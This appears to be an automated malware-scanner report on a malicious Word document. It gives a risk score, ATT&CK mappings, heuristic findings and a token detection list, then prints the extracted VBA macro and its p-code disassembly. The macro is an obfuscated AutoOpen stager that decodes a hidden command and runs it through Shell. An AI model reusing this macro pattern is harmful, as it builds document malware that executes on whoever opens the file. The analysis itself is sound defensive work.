MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro. The macro is designed to execute a second-stage payload, as indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. The obfuscated VBA code suggests an attempt to download and run further malicious content.
Heuristics 7
-
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGERRaw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (VpqyKylakEF) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28559 bytes |
SHA-256: 4f5c2d74be65e5b15c78a63c8f664de4521f37c181fbae7311e42ea471bd9301 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private qtWOhEHFVp As Boolean
Private DqWWeSgPLtlk(0 To 63) As Byte
Private TBUrQeGUJyHdoy((0 + (0 Xor 0)) To (100 Xor 27)) As Byte
Sub RcyLVMihhvHQSF()
Dim VpqyKylakEF As String
Dim scculoxjrZHG As String
VpqyKylakEF = xbJWSBoZdFIxrg(Array((30 + 135), 117, ((0 Xor 0) + 70), ((41 Xor 5) + 129), (28 Xor 43), ((31 Xor 47) + 94), (7 + (54 Xor 11)), 226, ((111 Xor 207) + 57), (190 Xor 72), 101, (179 + 39), ((3 Xor 64) + 154), (31 Xor 133), (142 Xor 65), (108 + 49), 234, ((27 Xor 91) + 34), (7 + 11), (131 Xor 114), (60 Xor 95), ((3 Xor 7) + 175), (3 Xor 61), (172 + 4), (185 + 55), (35 + (128 Xor 19)), ((0 Xor 80) + (4 Xor 159)), (18 + 111), (42 Xor 127), ((6 Xor 47) + 69), 173, 187, (128 Xor 80), (184 + 19), ((9 Xor 169) + 58), (73 + (54 Xor 102)), (63 + 75), 115, ((0 Xor 0) + 7), _
(58 Xor 106), (89 + (16 Xor 6)), 19, 21, ((35 Xor 231) + 59), ((0 Xor 3) + (10 Xor 42)), 230, (130 + (4 Xor 46)), 84, ((26 Xor 81) + (122 Xor 206)), (54 Xor 13), 38, (35 Xor 114), (5 Xor 8), 44, ((4 Xor 45) + (34 Xor 27)), (98 Xor 1), (4 Xor 16), (34 Xor 191), (25 Xor 2), (171 Xor 69), (1 Xor 193), (36 + 2), (85 Xor 227), 198, ((45 Xor 19) + (62 Xor 101)), 252, (209 + (29 Xor 0)), ((27 Xor 65) + (13 Xor 92)), ((4 Xor 1) + 139), (37 + (39 Xor 177)), (15 Xor 32), ((0 Xor 16) + 203), (91 + (71 Xor 35)), (30 Xor 42), (114 Xor 231), 181, (9 Xor 83), _
((0 Xor 2) + 41), 48, 201, (107 + (64 Xor 16)), (69 Xor 21), (72 + (10 Xor 74))), ((0 Xor 0) + 0)) & xbJWSBoZdFIxrg(Array(((20 Xor 61) + 95), ((23 Xor 13) + (4 Xor 13)), (1 Xor 9), (52 + 47), (10 + (79 Xor 35)), (106 + 108), (142 Xor 56), (62 + (2 Xor 0)), (67 Xor 157), 173, (1 Xor 15), ((2 Xor 1) + 49), 1, (100 + 81), (19 Xor 97), 207, (40 Xor 5), 27, 8, 94, 147, (19 + 123), 198, (67 + 14), ((106 Xor 251) + (31 Xor 59)), (74 + (73 Xor 2)), ((33 Xor 4) + (72 Xor 35)), ((7 Xor 52) + (6 Xor 64)), (155 + (24 Xor 50)), (42 Xor 179), ((4 Xor 0) + (3 Xor 23))), _
((39 Xor 104) + 4))
Shell (VpqyKylakEF)
End Sub
Sub AutoOpen()
RcyLVMihhvHQSF
End Sub
Public Function gDhilYVZfd(ByVal seeDJMdshqsu As String) As Byte()
If Not qtWOhEHFVp Then mUvipGOzyLeegq
Dim ZPkTYwMRiJ() As Byte: ZPkTYwMRiJ = iMhoSwiPpAz(seeDJMdshqsu)
Dim HxDShcRIMmse As Long: HxDShcRIMmse = UBound(ZPkTYwMRiJ) + (0 + 1)
If HxDShcRIMmse Mod (3 + 1) <> (0 + (0 Xor 0)) Then Err.Raise vbObjectError, , ""
Do While HxDShcRIMmse > ((0 Xor 0) + 0)
If ZPkTYwMRiJ(HxDShcRIMmse - ((0 Xor 0) + 1)) <> Asc("=") Then Exit Do
HxDShcRIMmse = HxDShcRIMmse - ((1 Xor 0) + 0)
Loop
Dim IXeGkuufzlXlX As Long: IXeGkuufzlXlX = (HxDShcRIMmse * (0 + (3 Xor 0))) \ ((0 Xor 2) + (0 Xor 2))
Dim uSeACqFJNZ() As Byte
ReDim uSeACqFJNZ(((0 Xor 0) + 0) To IXeGkuufzlXlX - (0 Xor 1)) As Byte
Dim CZIAlZIyFcIbt As Long
Dim RuoyzDYBksOD As Long
Do While CZIAlZIyFcIbt < HxDShcRIMmse
Dim FubDntsHzex As Byte: FubDntsHzex = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + 1
Dim fLwCTzrWAChXvG As Byte: fLwCTzrWAChXvG = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + (0 Xor 1)
Dim XbXlSPnqVMHJW As Byte: If CZIAlZIyFcIbt < HxDShcRIMmse Then XbXlSPnqVMHJW = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + (1 + (0 Xor 0)) Else XbXlSPnqVMHJW = Asc("A")
Dim FPVpOMdlGPS As Byte: If CZIAlZIyFcIbt < HxDShcRIMmse Then FPVpOMdlGPS = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + ((0 Xor 1) + (0 Xor 0)) Else FPVpOMdlGPS = Asc("A")
If FubDntsHzex > (43 + (34 Xor 118)) Or fLwCTzrWAChXvG > (32 Xor 95) Or XbXlSPnqVMHJW > (59 Xor 68) Or FPVpOMdlGPS > (91 + 36) Then _
Err.Raise vbObjectError, , ""
Dim HEkJMWzctvfK As Byte: HEkJMWzctvfK = TBUrQeGUJyHdoy(FubDntsHzex)
Dim YPqjtIIBYdmGRw As Byte: YPqjtIIBYdmGRw = TBUrQeGUJyHdoy(fLwCTzrWAChXvG)
Dim DrNlikgqMTPa As Byte: DrNlikgqMTPa = TBUrQeGUJyHdoy(XbXlSPnqVMHJW)
Dim wULueEKYjlq As Byte: wULueEKYjlq = TBUrQeGUJyHdoy(FPVpOMdlGPS)
If HEkJMWzctvfK > (4 Xor 59) Or YPqjtIIBYdmGRw > 63 Or DrNlikgqMTPa > ((6 Xor 30) + (32 Xor 7)) Or wULueEKYjlq > (50 + (11 Xor 6)) Then _
Err.Raise vbObjectError, , ""
Dim JRQchnANcOIC As Byte: JRQchnANcOIC = (HEkJMWzctvfK * 4) Or (YPqjtIIBYdmGRw \ &H10)
Dim kVZFHxrgsmkI As Byte: kVZFHxrgsmkI = ((YPqjtIIBYdmGRw And &HF) * &H10) Or (DrNlikgqMTPa \ (0 + 4))
Dim OzGOndUIbCxr As Byte: OzGOndUIbCxr = ((DrNlikgqMTPa And ((1 Xor 3) + 1)) * &H40) Or wULueEKYjlq
uSeACqFJNZ(RuoyzDYBksOD) = JRQchnANcOIC: RuoyzDYBksOD = RuoyzDYBksOD + (0 + 1)
If RuoyzDYBksOD < IXeGkuufzlXlX Then uSeACqFJNZ(RuoyzDYBksOD) = kVZFHxrgsmkI: RuoyzDYBksOD = RuoyzDYBksOD + 1
If RuoyzDYBksOD < IXeGkuufzlXlX Then uSeACqFJNZ(RuoyzDYBksOD) = OzGOndUIbCxr: RuoyzDYBksOD = RuoyzDYBksOD + 1
Loop
gDhilYVZfd = uSeACqFJNZ
End Function
Private Sub mUvipGOzyLeegq()
Dim YFHxKEheVXo As Integer, HLWJDHzPjZfWYW As Integer
HLWJDHzPjZfWYW = ((0 Xor 0) + (0 Xor 0))
For YFHxKEheVXo = Asc("A") To Asc("Z"): DqWWeSgPLtlk(HLWJDHzPjZfWYW) = YFHxKEheVXo: HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (1 Xor 0): Next
For YFHxKEheVXo = Asc("a") To Asc("z"): DqWWeSgPLtlk(HLWJDHzPjZfWYW) = YFHxKEheVXo: HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + 1: Next
For YFHxKEheVXo = Asc("0") To Asc("9"): DqWWeSgPLtlk(HLWJDHzPjZfWYW) = YFHxKEheVXo: HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (1 + (0 Xor 0)): Next
DqWWeSgPLtlk(HLWJDHzPjZfWYW) = Asc("+"): HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (1 + (0 Xor 0))
DqWWeSgPLtlk(HLWJDHzPjZfWYW) = Asc("/"): HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (0 Xor 1)
For HLWJDHzPjZfWYW = (0 + (0 Xor 0)) To (11 Xor 116): TBUrQeGUJyHdoy(HLWJDHzPjZfWYW) = 255: Next
For HLWJDHzPjZfWYW = (0 + 0) To ((15 Xor 30) + 46): TBUrQeGUJyHdoy(DqWWeSgPLtlk(HLWJDHzPjZfWYW)) = HLWJDHzPjZfWYW: Next
qtWOhEHFVp = True
End Sub
Private Function iMhoSwiPpAz(ByVal seeDJMdshqsu As String) As Byte()
Dim YPqjtIIBYdmGRw() As Byte: YPqjtIIBYdmGRw = seeDJMdshqsu
Dim wfmavbMxEIj As Long: wfmavbMxEIj = (UBound(YPqjtIIBYdmGRw) + ((0 Xor 0) + 1)) \ (0 + 2)
If wfmavbMxEIj = (0 + 0) Then iMhoSwiPpAz = YPqjtIIBYdmGRw: Exit Function
Dim DrNlikgqMTPa() As Byte
ReDim DrNlikgqMTPa(0 To wfmavbMxEIj - 1) As Byte
Dim zJSRGLkMzOdmL As Long
For zJSRGLkMzOdmL = 0 To wfmavbMxEIj - ((1 Xor 0) + (0 Xor 0))
Dim YFHxKEheVXo As Long: YFHxKEheVXo = YPqjtIIBYdmGRw(((0 Xor 0) + 2) * zJSRGLkMzOdmL) + (251 + (0 Xor 5)) * CLng(YPqjtIIBYdmGRw((1 Xor 3) * zJSRGLkMzOdmL + ((0 Xor 1) + 0)))
If YFHxKEheVXo >= (82 Xor 338) Then YFHxKEheVXo = Asc("?")
DrNlikgqMTPa(zJSRGLkMzOdmL) = YFHxKEheVXo
Next
iMhoSwiPpAz = DrNlikgqMTPa
End Function
Private Function xbJWSBoZdFIxrg(ZuVPRZQvfMajQ As Variant, NgXWjIsUXH As Integer)
Dim gPbkfJLadbo As String
Dim SZHeWyfOxry() As Byte
SZHeWyfOxry = gDhilYVZfd(ActiveDocument.Variables("zImKDUInUVemuvor"))
gPbkfJLadbo = ""
For HLWJDHzPjZfWYW = LBound(ZuVPRZQvfMajQ) To UBound(ZuVPRZQvfMajQ)
gPbkfJLadbo = gPbkfJLadbo & Chr(SZHeWyfOxry(HLWJDHzPjZfWYW + NgXWjIsUXH) Xor ZuVPRZQvfMajQ(HLWJDHzPjZfWYW))
Next
xbJWSBoZdFIxrg = gPbkfJLadbo
End Function
' Processing file: /tmp/qstore_7gxr3xjc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1028 bytes
' Macros/VBA/NewMacros - 18114 bytes
' Line #0:
' Dim (Private)
' VarDefn VpqyKylakEF (As Boolean) 0x0019
' Line #1:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x003F
' VarDefn scculoxjrZHG (As Byte) 0x001F
' Line #2:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0064
' LitDI2 0x001B
' Xor
' Paren
' VarDefn xbJWSBoZdFIxrg (As Byte)
' Line #3:
' FuncDefn (Sub gDhilYVZfd())
' Line #4:
' Dim
' VarDefn seeDJMdshqsu (As String)
' Line #5:
' Dim
' VarDefn mUvipGOzyLeegq (As String)
' Line #6:
' LineCont 0x000C 10 01 00 00 18 02 00 00 2B 03 00 00
' LitDI2 0x001E
' LitDI2 0x0087
' Add
' Paren
' LitDI2 0x0075
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0046
' Add
' Paren
' LitDI2 0x0029
' LitDI2 0x0005
' Xor
' Paren
' LitDI2 0x0081
' Add
' Paren
' LitDI2 0x001C
' LitDI2 0x002B
' Xor
' Paren
' LitDI2 0x001F
' LitDI2 0x002F
' Xor
' Paren
' LitDI2 0x005E
' Add
' Paren
' LitDI2 0x0007
' LitDI2 0x0036
' LitDI2 0x000B
' Xor
' Paren
' Add
' Paren
' LitDI2 0x00E2
' LitDI2 0x006F
' LitDI2 0x00CF
' Xor
' Paren
' LitDI2 0x0039
' Add
' Paren
' LitDI2 0x00BE
' LitDI2 0x0048
' Xor
' Paren
' LitDI2 0x0065
' LitDI2 0x00B3
' LitDI2 0x0027
' Add
' Paren
' LitDI2 0x0003
' LitDI2 0x0040
' Xor
' Paren
' LitDI2 0x009A
' Add
' Paren
' LitDI2 0x001F
' LitDI2 0x0085
' Xor
' Paren
' LitDI2 0x008E
' LitDI2 0x0041
' Xor
' Paren
' LitDI2 0x006C
' LitDI2 0x0031
' Add
' Paren
' LitDI2 0x00EA
' LitDI2 0x001B
' LitDI2 0x005B
' Xor
' Paren
' LitDI2 0x0022
' Add
' Paren
' LitDI2 0x0007
' LitDI2 0x000B
' Add
' Paren
' LitDI2 0x0083
' LitDI2 0x0072
' Xor
' Paren
' LitDI2 0x003C
' LitDI2 0x005F
' Xor
' Paren
' LitDI2 0x0003
' LitDI2 0x0007
' Xor
' Paren
' LitDI2 0x00AF
' Add
' Paren
' LitDI2 0x0003
' LitDI2 0x003D
' Xor
' Paren
' LitDI2 0x00AC
' LitDI2 0x0004
' Add
' Paren
' LitDI2 0x00B9
' LitDI2 0x0037
' Add
' Paren
' LitDI2 0x0023
' LitDI2 0x0080
' LitDI2 0x0013
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0000
' LitDI2 0x0050
' Xor
' Paren
' LitDI2 0x0004
' LitDI2 0x009F
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0012
' LitDI2 0x006F
' Add
' Paren
' LitDI2 0x002A
' LitDI2 0x007F
' Xor
' Paren
' LitDI2 0x0006
' LitDI2 0x002F
' Xor
' Paren
' LitDI2 0x0045
' Add
' Paren
' LitDI2 0x00AD
' LitDI2 0x00BB
' LitDI2 0x0080
' LitDI2 0x0050
' Xor
' Paren
' LitDI2 0x00B8
' LitDI2 0x0013
' Add
' Paren
' LitDI2 0x0009
' LitDI2 0x00A9
' Xor
' Paren
' LitDI2 0x003A
' Add
' Paren
' LitDI2 0x0049
' LitDI2 0x0036
' LitDI2 0x0066
' Xor
' Paren
' Add
' Paren
' LitDI2 0x003F
' LitDI2 0x004B
' Add
' Paren
' LitDI2 0x0073
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0007
' Add
' Paren
' LitDI2 0x003A
' LitDI2 0x006A
' Xor
' Paren
' LitDI2 0x0059
' LitDI2 0x0010
' LitDI2 0x0006
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0013
' LitDI2 0x0015
' LitDI2 0x0023
' LitDI2 0x00E7
' Xor
' Paren
' LitDI2 0x003B
' Add
' Paren
' LitDI2 0x0000
' LitDI2 0x0003
' Xor
' Paren
' LitDI2 0x000A
' LitDI2 0x002A
' Xor
' Paren
' Add
' Paren
' LitDI2 0x00E6
' LitDI2 0x0082
' LitDI2 0x0004
' LitDI2 0x002E
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0054
' LitDI2 0x001A
' LitDI2 0x0051
' Xor
' Paren
' LitDI2 0x007A
' LitDI2 0x00CE
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0036
' LitDI2 0x000D
' Xor
' Paren
' LitDI2 0x0026
' LitDI2 0x0023
' LitDI2 0x0072
' Xor
' Paren
' LitDI2 0x0005
' LitDI2 0x0008
' Xor
' Paren
' LitDI2 0x002C
' LitDI2 0x0004
' LitDI2 0x002D
' Xor
' Paren
' LitDI2 0x0022
' LitDI2 0x001B
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0062
' LitDI2 0x0001
' Xor
' Paren
' LitDI2 0x0004
' LitDI2 0x0010
' Xor
' Paren
' LitDI2 0x0022
' LitDI2 0x00BF
' Xor
' Paren
' LitDI2 0x0019
' LitDI2 0x0002
' Xor
' Paren
' LitDI2 0x00AB
' LitDI2 0x0045
' Xor
' Paren
' LitDI2 0x0001
' LitDI2 0x00C1
' Xor
' Paren
' LitDI2 0x0024
' LitDI2 0x0002
' Add
' Paren
' LitDI2 0x0055
' LitDI2 0x00E3
' Xor
' Paren
' LitDI2 0x00C6
' LitDI2 0x002D
' LitDI2 0x0013
' Xor
' Paren
' LitDI2 0x003E
' LitDI2 0x0065
' Xor
' Paren
' Add
' Paren
' LitDI2 0x00FC
' LitDI2 0x00D1
' LitDI2 0x001D
' LitDI2 0x0000
' Xor
' Paren
' Add
' Paren
' LitDI2 0x001B
' LitDI2 0x0041
' Xor
' Paren
' LitDI2 0x000D
' LitDI2 0x005C
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0004
' LitDI2 0x0001
' Xor
' Paren
' LitDI2 0x008B
' Add
' Paren
' LitDI2 0x0025
' LitDI2 0x0027
' LitDI2 0x00B1
' Xor
' Paren
' Add
' Paren
' LitDI2 0x000F
' LitDI2 0x0020
' Xor
' Paren
' LitDI2 0x0000
' LitDI2 0x0010
' Xor
' Paren
' LitDI2 0x00CB
' Add
' Paren
' LitDI2 0x005B
' LitDI2 0x0047
' LitDI2 0x0023
' Xor
' Paren
' Add
' Paren
' LitDI2 0x001E
' LitDI2 0x002A
' Xor
' Paren
' LitDI2 0x0072
' LitDI2 0x00E7
' Xor
' Paren
' LitDI2 0x00B5
' LitDI2 0x0009
' LitDI2 0x0053
' Xor
' Paren
' LitDI2 0x0000
' LitDI2 0x0002
' Xor
' Paren
' LitDI2 0x0029
' Add
' Paren
' LitDI2 0x0030
' LitDI2 0x00C9
' LitDI2 0x006B
' LitDI2 0x0040
' LitDI2 0x0010
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0045
' LitDI2 0x0015
' Xor
' Paren
' LitDI2 0x0048
' LitDI2 0x000A
' LitDI2 0x004A
' Xor
' Paren
' Add
' Paren
' ArgsArray Array 0x0053
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0000
' Add
' Paren
' ArgsLd ZPkTYwMRiJ 0x0002
' LitDI2 0x0014
' LitDI2 0x003D
' Xor
' Paren
' LitDI2 0x005F
' Add
' Paren
' LitDI2 0x0017
' LitDI2 0x000D
' Xor
' Paren
' LitDI2 0x0004
' LitDI2 0x000D
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0001
' LitDI2 0x0009
' Xor
' Paren
' LitDI2 0x0034
' LitDI2 0x002F
' Add
' Paren
' LitDI2 0x000A
' LitDI2 0x004F
' LitDI2 0x0023
' Xor
' Paren
' Add
' Paren
' LitDI2 0x006A
' LitDI2 0x006C
' Add
' Paren
' LitDI2 0x008E
' LitDI2 0x0038
' Xor
' Paren
' LitDI2 0x003E
' LitDI2 0x0002
' LitDI2 0x0000
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0043
' LitDI2 0x009D
' Xor
' Paren
' LitDI2 0x00AD
' LitDI2 0x0001
' LitDI2 0x000F
' Xor
' Paren
' LitDI2 0x0002
' LitDI2 0x0001
' Xor
' Paren
' LitDI2 0x0031
' Add
' Paren
' LitDI2 0x0001
' LitDI2 0x0064
' LitDI2 0x0051
' Add
' Paren
' LitDI2 0x0013
' LitDI2 0x0061
' Xor
' Paren
' LitDI2 0x00CF
' LitDI2 0x0028
' LitDI2 0x0005
' Xor
' Paren
' LitDI2 0x001B
' LitDI2 0x0008
' LitDI2 0x005E
' LitDI2 0x0093
' LitDI2 0x0013
' LitDI2 0x007B
' Add
' Paren
' LitDI2 0x00C6
' LitDI2 0x0043
' LitDI2 0x000E
' Add
' Paren
' LitDI2 0x006A
' LitDI2 0x00FB
' Xor
' Paren
' LitDI2 0x001F
' LitDI2 0x003B
' Xor
' Paren
' Add
' Paren
' LitDI2 0x004A
' LitDI2 0x0049
' LitDI2 0x0002
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0021
' LitDI2 0x0004
' Xor
' Paren
' LitDI2 0x0048
' LitDI2 0x0023
' Xor
' Paren
' Add
' Paren
' LitDI2 0x0007
' LitDI2 0x0034
' Xor
' Paren
' LitDI2 0x0006
' LitDI2 0x0040
' Xor
' Paren
' Add
' Paren
' LitDI2 0x009B
' LitDI2 0x0018
' LitDI2 0x0032
' Xor
' Paren
' Add
' Paren
' LitDI2 0x002A
' LitDI2 0x00B3
' Xor
' Paren
' LitDI2 0x0004
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0003
' LitDI2 0x0017
' Xor
' Paren
' Add
' Paren
' ArgsArray Array 0x001F
' LitDI2 0x0027
' LitDI2 0x0068
' Xor
' Paren
' LitDI2 0x0004
' Add
' Paren
' ArgsLd ZPkTYwMRiJ 0x0002
' Concat
' St seeDJMdshqsu
' Line #7:
' Ld seeDJMdshqsu
' Paren
' ArgsCall fHKMLmbaBKkbCT 0x0001
' Line #8:
' EndSub
' Line #9:
' FuncDefn (Sub fGEnVAoaorjNXo())
' Line #10:
' ArgsCall gDhilYVZfd 0x0000
' Line #11:
' EndSub
' Line #12:
' FuncDefn (Public Function iMhoSwiPpAz(ByVal HxDShcRIMmse As String) As Append)
' Line #13:
' Ld VpqyKylakEF
' Not
' If
' BoSImplicit
' ArgsCall IXeGkuufzlXlX 0x0000
' EndIf
' Line #14:
' Dim
' VarDefn uSeACqFJNZ (As Byte)
' BoS 0x0000
' Ld HxDShcRIMmse
' ArgsLd CZIAlZIyFcIbt 0x0001
' St uSeACqFJNZ
' Line #15:
' Dim
' VarDefn RuoyzDYBksOD (As Long)
' BoS 0x0000
' Ld uSeACqFJNZ
' FnUBound 0x0000
' LitDI2 0x0000
' LitDI2 0x0001
' Add
' Paren
' Add
' St RuoyzDYBksOD
' Line #16:
' Ld RuoyzDYBksOD
' LitDI2 0x0003
' LitDI2 0x0001
' Add
' Paren
' Mod
' LitDI2 0x0000
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' Add
' Paren
' Ne
' If
' BoSImplicit
' Ld lyIpKvykVWFwD
' ParamOmitted
' LitStr 0x0000 ""
' Ld xgFORAXlca
' ArgsMemCall GxjJxrgqZIyelI 0x0003
' EndIf
' Line #17:
' Ld RuoyzDYBksOD
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0000
' Add
' Paren
' Gt
' DoWhile
' Line #18:
' Ld RuoyzDYBksOD
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0001
' Add
' Paren
' Sub
' ArgsLd uSeACqFJNZ 0x0001
' LitStr 0x0001 "="
' ArgsLd tilqikAfbaivu 0x0001
' Ne
' If
' BoSImplicit
' ExitDo
' EndIf
' Line #19:
' Ld RuoyzDYBksOD
' LitDI2 0x0001
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0000
' Add
' Paren
' Sub
' St RuoyzDYBksOD
' Line #20:
' Loop
' Line #21:
' Dim
' VarDefn FubDntsHzex (As Long)
' BoS 0x0000
' Ld RuoyzDYBksOD
' LitDI2 0x0000
' LitDI2 0x0003
' LitDI2 0x0000
' Xor
' Paren
' Add
' Paren
' Mul
' Paren
' LitDI2 0x0000
' LitDI2 0x0002
' Xor
' Paren
' LitDI2 0x0000
' LitDI2 0x0002
' Xor
' Paren
' Add
' Paren
' IDiv
' St FubDntsHzex
' Line #22:
' Dim
' VarDefn fLwCTzrWAChXvG (As Byte)
' Line #23:
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' LitDI2 0x0000
' Add
' Paren
' Ld FubDntsHzex
' LitDI2 0x0000
' LitDI2 0x0001
' Xor
' Paren
' Sub
' RedimAs fLwCTzrWAChXvG 0x0001 (As Byte)
' Line #24:
' Dim
' VarDefn XbXlSPnqVMHJW (As Long)
' Line #25:
' Dim
' VarDefn FPVpOMdlGPS (As Long)
' Line #26:
' Ld XbXlSPnqVMHJW
' Ld RuoyzDYBksOD
' Lt
' DoWhile
' Line #27:
' Dim
' VarDefn HEkJMWzctvfK (As Byte)
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' ArgsLd uSeACqFJNZ 0x0001
' St HEkJMWzctvfK
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' LitDI2 0x0001
' Add
' St XbXlSPnqVMHJW
' Line #28:
' Dim
' VarDefn YPqjtIIBYdmGRw (As Byte)
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' ArgsLd uSeACqFJNZ 0x0001
' St YPqjtIIBYdmGRw
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' LitDI2 0x0000
' LitDI2 0x0001
' Xor
' Paren
' Add
' St XbXlSPnqVMHJW
' Line #29:
' Dim
' VarDefn DrNlikgqMTPa (As Byte)
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' Ld RuoyzDYBksOD
' Lt
' If
' BoSImplicit
' Ld XbXlSPnqVMHJW
' ArgsLd uSeACqFJNZ 0x0001
' St DrNlikgqMTPa
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' LitDI2 0x0001
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' Add
' Paren
' Add
' St XbXlSPnqVMHJW
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd tilqikAfbaivu 0x0001
' St DrNlikgqMTPa
' EndIf
' Line #30:
' Dim
' VarDefn wULueEKYjlq (As Byte)
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' Ld RuoyzDYBksOD
' Lt
' If
' BoSImplicit
' Ld XbXlSPnqVMHJW
' ArgsLd uSeACqFJNZ 0x0001
' St wULueEKYjlq
' BoS 0x0000
' Ld XbXlSPnqVMHJW
' LitDI2 0x0000
' LitDI2 0x0001
' Xor
' Paren
' LitDI2 0x0000
' LitDI2 0x0000
' Xor
' Paren
' Add
' Paren
' Add
' St XbXlSPnqVMHJW
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd tilqikAfbaivu 0x0001
' St wULueEKYjlq
' EndIf
' Line #31:
' LineCont 0x0004 25 00 00 00
' Ld HEkJMWzctvfK
' LitDI2 0x002B
' LitDI2 0x0022
' LitDI2 0x0076
' Xor
' Paren
' Add
' Paren
' Gt
' Ld YPqjtIIBYdmGRw
' LitDI2 0x0020
' LitDI2 0x005F
' Xor
' Paren
' Gt
' Or
' Ld DrNlikgqMTPa
' LitDI2 0x003B
' LitDI2 0x0044
' Xor
' Paren
' Gt
' Or
' Ld wULueEKYjlq
' LitDI2 0x005B
' LitDI2 0x0024
' Add
' Paren
' Gt
' Or
' If
' BoSImplicit
' Ld lyIpKvykVWFwD
' ParamOmitted
' LitStr 0x0000 ""
' Ld xgFORAXlca
' ArgsMemCall GxjJxrgqZIyelI 0x0003
' EndIf
' Line #32:
' Dim
' VarDefn JRQchnANcOIC (As Byte)
' BoS 0x0000
' Ld HEkJMWzctvfK
' ArgsLd xbJWSBoZdFIxrg 0x0001
' St JRQchnANcOIC
' Line #33:
' Dim
' VarDefn kVZFHxrgsmkI (As Byte)
' BoS 0x0000
' Ld YPqjtIIBYdmGRw
' ArgsLd xbJWSBoZdFIxrg 0x0001
' St kVZFHxrgsmkI
' Line #34:
' Dim
' VarDefn OzGOndUIbCxr (As Byte)
' BoS 0x0000
' Ld DrNlikgqMTPa
' ArgsLd xbJWSBoZdFIxrg 0x0001
' St OzGOndUIbCxr
